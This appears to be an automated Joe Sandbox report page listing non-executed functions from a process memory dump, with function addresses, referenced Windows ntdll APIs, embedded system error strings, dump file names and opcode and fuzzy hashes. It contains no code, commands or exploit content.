String ID:
API String ID:
Opcode ID: 1b8c77407e3df770313feec9b6e3edf85d36f4b9211376d07cb757514e6c501c
Instruction ID: 7ccc222256717fbe9da66e19fb99f99b4cedf2c9040dc8624fa9e7752e448d56
Opcode Fuzzy Hash: 1b8c77407e3df770313feec9b6e3edf85d36f4b9211376d07cb757514e6c501c
Instruction Fuzzy Hash: 60E02B71F84700ABD210E625EC82FEA73A8EB85304F50095EF29886080CB743A80C3D6

Non-executed Functions

Function 010B4A80 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 51
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDebugPrintTimes.NTDLL ref: 010B4A8F

Strings

0Iv, xrefs: 010B4AEA, 010B4AEF
0Iv, xrefs: 010B4ADA
0Iv, xrefs: 010B4B14
0Iv, xrefs: 010B4B04, 010B4B09
0Iv, xrefs: 010B4AFA
0Iv, xrefs: 010B4AD0, 010B4AD5

Memory Dump Source

Source File: 0000000E.00000002.2417256355.0000000001066000.00000040.00001000.00020000.00000000.sdmp, Offset: 01040000, based on PE: true

Associated: 0000000E.00000002.2417256355.0000000001040000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001047000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001102000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001163000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001169000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1040000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0Iv$0Iv$0Iv$0Iv$0Iv$0Iv
API String ID: 3446177414-2083360775
Opcode ID: 78186c8cfa012878e57cff017258ec1b3d1bb2922bd5a226b940f18e8b494cc5
Instruction ID: ece3e46ee17e349d562bdadb7de53e330605563ad3fb36ba148d156d43503b8d
Opcode Fuzzy Hash: 78186c8cfa012878e57cff017258ec1b3d1bb2922bd5a226b940f18e8b494cc5
Instruction Fuzzy Hash: 2D01F532E052489FD72C9E287A447C63AD9B784738F154069EA58DF295D7734CC1D390

Function 010B2890 Relevance: 9.2, APIs: 6, Instructions: 190
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___swprintf_l.LIBCMT ref: 010B293C
___swprintf_l.LIBCMT ref: 010B295E
___swprintf_l.LIBCMT ref: 010B29A3
___swprintf_l.LIBCMT ref: 010EA52E

Memory Dump Source

Source File: 0000000E.00000002.2417256355.0000000001066000.00000040.00001000.00020000.00000000.sdmp, Offset: 01040000, based on PE: true

Associated: 0000000E.00000002.2417256355.0000000001040000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001047000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001102000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001163000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001169000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1040000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: ___swprintf_l
String ID:
API String ID: 48624451-0
Opcode ID: f5e4d83f72fe208243e17d6a144edcbf09dbd9c7ea4f8079757cbc75d288f777
Instruction ID: 210e2eece5c685b18c375e7ca2c92bc688823c8f697528b19beedb39b46459e2
Opcode Fuzzy Hash: f5e4d83f72fe208243e17d6a144edcbf09dbd9c7ea4f8079757cbc75d288f777
Instruction Fuzzy Hash: 7751D9B6A00116BFCB21DB5D88D49BEFBF8BB48240B148169F4E9D7641D374EE408BE0

Function 0108A250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 404
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 010D79D5
SsHd, xrefs: 0108A3E4
RtlpFindActivationContextSection_CheckParameters, xrefs: 010D79D0, 010D79F5
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 010D79FA

Memory Dump Source

Source File: 0000000E.00000002.2417256355.0000000001066000.00000040.00001000.00020000.00000000.sdmp, Offset: 01040000, based on PE: true

Associated: 0000000E.00000002.2417256355.0000000001040000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001047000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001102000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001163000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001169000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1040000_IiIseKTckjhZgQ.jbxd

Similarity

API ID:
String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-929470617
Opcode ID: 7c25ffec68dfbf4644ddef8d85e76e57ad1fbee91b0165f63e575a347e86a8bf
Instruction ID: 658984a40c160c490626ceb0ca48ba23f180a9da89a6aab9617b8b16073f2eba
Opcode Fuzzy Hash: 7c25ffec68dfbf4644ddef8d85e76e57ad1fbee91b0165f63e575a347e86a8bf
Instruction Fuzzy Hash: A9E1F471708302CFDB65DE2CC484B2ABBE0BB88218F144A6EF9D5CB691D731D985CB52

Function 0108D770 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDebugPrintTimes.NTDLL ref: 010D948C

Strings

GsHd, xrefs: 0108D874
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 010D9346
RtlpFindActivationContextSection_CheckParameters, xrefs: 010D9341, 010D9366
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 010D936B

Memory Dump Source

Source File: 0000000E.00000002.2417256355.0000000001066000.00000040.00001000.00020000.00000000.sdmp, Offset: 01040000, based on PE: true

Associated: 0000000E.00000002.2417256355.0000000001040000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001047000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001102000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001163000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001169000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1040000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
API String ID: 3446177414-576511823
Opcode ID: 14e843c4c8a5d02363908906f336d9ad9fafb6940d7d63e9cfc0137f8fc27326
Instruction ID: ba39cf89d90a2b11aba6041025887341e29820b0c4a43e782859443a84186793
Opcode Fuzzy Hash: 14e843c4c8a5d02363908906f336d9ad9fafb6940d7d63e9cfc0137f8fc27326
Instruction Fuzzy Hash: 86E1C470608342DFDB64DF98C480B6ABBE5BF88318F044A6DE9D5CB281D771E944CB52

Function 010BB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__aulldvrm.LIBCMT ref: 010BB6BF

Strings

-, xrefs: 010BB650
+, xrefs: 010BB65A
0, xrefs: 010BB66F
0, xrefs: 010BB695

Memory Dump Source

Source File: 0000000E.00000002.2417256355.0000000001066000.00000040.00001000.00020000.00000000.sdmp, Offset: 01040000, based on PE: true

Associated: 0000000E.00000002.2417256355.0000000001040000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001047000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001102000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001163000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001169000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1040000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
Instruction ID: 30720cd07f77054c1a83ef325a1b4dcd293ab1682b82d00362c1cbea9ae9fb30
Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
Instruction Fuzzy Hash: 8881AF70E452499FEF258E6CC8D17FEBBE1BF49320F18429AD8E1A7291C7349841CB55

Function 01079126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDebugPrintTimes.NTDLL ref: 010D2559

Strings

@, xrefs: 01079175
$, xrefs: 01079191

Memory Dump Source

Source File: 0000000E.00000002.2417256355.0000000001066000.00000040.00001000.00020000.00000000.sdmp, Offset: 01040000, based on PE: true

Associated: 0000000E.00000002.2417256355.0000000001040000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001047000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001102000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001163000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001169000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1040000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$@
API String ID: 3446177414-1194432280
Opcode ID: db4bddee59e9ba071a4b72dda5bc6eb3a3ce3fb066b1c977f9b3dd8107828a15
Instruction ID: 3d885b1e6dede0a3e05a700fc52bf68d11e1dad04fe8632426c261ab2ea93427
Opcode Fuzzy Hash: db4bddee59e9ba071a4b72dda5bc6eb3a3ce3fb066b1c977f9b3dd8107828a15
Instruction Fuzzy Hash: 82812971D00269DBDB35DB54CC44BEEBBB8AB48754F0041EAEA59B7240E7309E85CFA4

Function 010B4960 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 82
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDebugPrintTimes.NTDLL ref: 010B49A4

Strings

0Iv, xrefs: 010B4A03
0Iv, xrefs: 010B4A13
X, xrefs: 010B49F0
0Iv, xrefs: 010B4A23

Memory Dump Source

Source File: 0000000E.00000002.2417256355.0000000001066000.00000040.00001000.00020000.00000000.sdmp, Offset: 01040000, based on PE: true

Associated: 0000000E.00000002.2417256355.0000000001040000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001047000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001102000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001163000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001169000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1040000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0Iv$0Iv$0Iv$X
API String ID: 3446177414-728256981
Opcode ID: 9c917986f8edf9d11c4bf3de33c142073cc5c49ec3780904d84d6d3fe1cd8871
Instruction ID: 24618655dbbb41b20e4717c03dc6f7153f5a57b01d581e61e30654dadfcfabea
Opcode Fuzzy Hash: 9c917986f8edf9d11c4bf3de33c142073cc5c49ec3780904d84d6d3fe1cd8871
Instruction Fuzzy Hash: 5C31D43190420EEFCF26DF58D880BCD7BB5AB84354F0A4069FD5596262D3728BA0CF85

Function 0109DB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDebugPrintTimes.NTDLL ref: 010DF611

Strings

, passed to %s, xrefs: 010DF662
RtlUnlockHeap, xrefs: 010DF65D
Invalid heap signature for heap at %p, xrefs: 010DF653

Memory Dump Source

Source File: 0000000E.00000002.2417256355.0000000001066000.00000040.00001000.00020000.00000000.sdmp, Offset: 01040000, based on PE: true

Associated: 0000000E.00000002.2417256355.0000000001040000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001047000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001102000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001163000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001169000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1040000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
API String ID: 3446177414-56086060
Opcode ID: 277b3192e764f0fd40ea006d5f9e75a0ccbc3c446c493420f2542ab6d4e8a305
Instruction ID: f67cd51d73e57614c49d4dca952363d5e6ab9ff44a2d8f96c25fa44b104e5d5c
Opcode Fuzzy Hash: 277b3192e764f0fd40ea006d5f9e75a0ccbc3c446c493420f2542ab6d4e8a305
Instruction Fuzzy Hash: 32415B71600742DFDB26DF68C494BAAB7F4FF45724F1080A9D5C28BA91CB789881C790

Function 010F4755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDebugPrintTimes.NTDLL ref: 010F4809

Strings

LdrpCheckRedirection, xrefs: 010F488F
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 010F4888
minkernel\ntdll\ldrredirect.c, xrefs: 010F4899

Memory Dump Source

Source File: 0000000E.00000002.2417256355.00000000010C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01040000, based on PE: true

Associated: 0000000E.00000002.2417256355.0000000001040000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001047000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001066000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001102000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001163000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001169000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1040000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: 34af2f6e7bd0628b3695601b83f47f85e3587b7e2621f1dad64b572a57e200e2
Instruction ID: 4b3a1bed75849de87a1370301adfc5252a2c8f1c9bfac731824ced7f25e0ae7f
Opcode Fuzzy Hash: 34af2f6e7bd0628b3695601b83f47f85e3587b7e2621f1dad64b572a57e200e2
Instruction Fuzzy Hash: 1041D072A007519FCB61CE18D842A6B7BE4FF89A50F0505ADEED8DBB21D731E801CB81

Function 0109DBA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 010DF757

Strings

, passed to %s, xrefs: 010DF7A8
Invalid heap signature for heap at %p, xrefs: 010DF799
RtlLockHeap, xrefs: 010DF7A3

Memory Dump Source

Source File: 0000000E.00000002.2417256355.0000000001066000.00000040.00001000.00020000.00000000.sdmp, Offset: 01040000, based on PE: true

Associated: 0000000E.00000002.2417256355.0000000001040000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001047000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001102000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001163000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001169000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1040000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
API String ID: 3446177414-3526935505
Opcode ID: a79b0861f446d494996a16db8d985cd546c040dc1e94be785656ba34adc36eb7
Instruction ID: ccb8707357679130134cf69e2c0d50a706fd2d694aed8ff0e0552bd2a6bc4f9a
Opcode Fuzzy Hash: a79b0861f446d494996a16db8d985cd546c040dc1e94be785656ba34adc36eb7
Instruction Fuzzy Hash: 243167B0244785DFDB26DB6CC859BD97BE8FF01710F0480A9E4C28B652CBB8A881C761

Function 0106C070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0106C0B4
RtlDebugPrintTimes.NTDLL ref: 010CD623
RtlDebugPrintTimes.NTDLL ref: 010CD651

Strings

$, xrefs: 0106C07C

Memory Dump Source

Source File: 0000000E.00000002.2417256355.0000000001066000.00000040.00001000.00020000.00000000.sdmp, Offset: 01040000, based on PE: true

Associated: 0000000E.00000002.2417256355.0000000001040000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001047000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001102000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001163000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001169000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1040000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $
API String ID: 3446177414-3993045852
Opcode ID: 760fe05a6a0639cc5b579c2c1627c05f8f7c15f0e62caea4e86c8913503a5a49
Instruction ID: c5f618c2d30fb6e438708fde8d017e23dc39de03b39e077b4320fcefd12ef870
Opcode Fuzzy Hash: 760fe05a6a0639cc5b579c2c1627c05f8f7c15f0e62caea4e86c8913503a5a49
Instruction Fuzzy Hash: 3D111E32904219EFCF15AFA4E848ADD7B71FF44764F108529F966672E0CB729A40CF84

Function 0109EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2417256355.0000000001066000.00000040.00001000.00020000.00000000.sdmp, Offset: 01040000, based on PE: true

Associated: 0000000E.00000002.2417256355.0000000001040000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001047000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001102000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001163000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001169000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1040000_IiIseKTckjhZgQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db1c598f6f9d517bf7d46f610f7cc1bb51d34c4b21f6eeef4246461da4a67efd
Instruction ID: 1c0951ba8b8b21242de1b1104da2e7c6818330878845aa4c5c9a1d3950f019e4
Opcode Fuzzy Hash: db1c598f6f9d517bf7d46f610f7cc1bb51d34c4b21f6eeef4246461da4a67efd
Instruction Fuzzy Hash: 63E10EB0D00609CFCF65CFA9C990A9DBBF5BF48314F2445AAE986E7261D770A881DF50

Function 010EEF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 010EEFE1
RtlDebugPrintTimes.NTDLL ref: 010EF009
RtlDebugPrintTimes.NTDLL ref: 010EF0AC
RtlDebugPrintTimes.NTDLL ref: 010EF160

Memory Dump Source

Source File: 0000000E.00000002.2417256355.00000000010C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01040000, based on PE: true

Associated: 0000000E.00000002.2417256355.0000000001040000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001047000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001066000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001102000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001163000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001169000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1040000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: ef9b5e48f2249dfdc51b6e93380d045bd962ab95a0ea2c3d768cfff574714fe5
Instruction ID: e19e2be5000c1a56671bd292c51b72d398fe655ef10ebd3d2b9e531e5f09d046
Opcode Fuzzy Hash: ef9b5e48f2249dfdc51b6e93380d045bd962ab95a0ea2c3d768cfff574714fe5
Instruction Fuzzy Hash: E7714471E0021E9FDF05CFA9C888ADDBBF5BF49314F14406AEA45EB254D734A945CBA0

Function 010EF1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 010EF26D
RtlDebugPrintTimes.NTDLL ref: 010EF292
RtlDebugPrintTimes.NTDLL ref: 010EF324
RtlDebugPrintTimes.NTDLL ref: 010EF378

Memory Dump Source

Source File: 0000000E.00000002.2417256355.00000000010C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01040000, based on PE: true

Associated: 0000000E.00000002.2417256355.0000000001040000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001047000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001066000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001102000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001163000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001169000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1040000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 4681a49905a0a321811dba6d679fcc789f7689e604ff1495d230c044387feb43
Instruction ID: 0986a5d19fdb3826cfe2d129bd02ed127b7fc6eecd19f5199dcb3c0336c758e3
Opcode Fuzzy Hash: 4681a49905a0a321811dba6d679fcc789f7689e604ff1495d230c044387feb43
Instruction Fuzzy Hash: C85135B1E0021ADFEF08CFAAD8486DDBBF1BF48354F14812AE955A7290D734A941CF54

Function 010A7B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 010A7B52
BaseThreadInitThunk.KERNEL32 ref: 010A7B5C
RtlDebugPrintTimes.NTDLL ref: 010E49ED
RtlDebugPrintTimes.NTDLL ref: 010E4A70

Memory Dump Source

Source File: 0000000E.00000002.2417256355.0000000001066000.00000040.00001000.00020000.00000000.sdmp, Offset: 01040000, based on PE: true

Associated: 0000000E.00000002.2417256355.0000000001040000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001047000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001102000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001163000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001169000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1040000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: DebugPrintTimes$BaseInitThreadThunk
String ID:
API String ID: 4281723722-0
Opcode ID: ecaf7a955b7526235d2a127916f9a3ddc024b97b9aa7799b86473e138742374c
Instruction ID: e049b9f331d92616e974e3b76b764ed33046b2dba20a0348450dee846065f365
Opcode Fuzzy Hash: ecaf7a955b7526235d2a127916f9a3ddc024b97b9aa7799b86473e138742374c
Instruction Fuzzy Hash: 96312575E00219DFCF69DFA9D889A9DBBF1BB48720F14412AE521F7290CB315940CF54

Function 010759C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON

Download Yara Rule

Strings

@, xrefs: 010D0AA7

Memory Dump Source

Source File: 0000000E.00000002.2417256355.0000000001066000.00000040.00001000.00020000.00000000.sdmp, Offset: 01040000, based on PE: true

Associated: 0000000E.00000002.2417256355.0000000001040000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001047000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001102000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001163000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001169000.00000040.00001000.00020000.00000000.sdmpDownload File

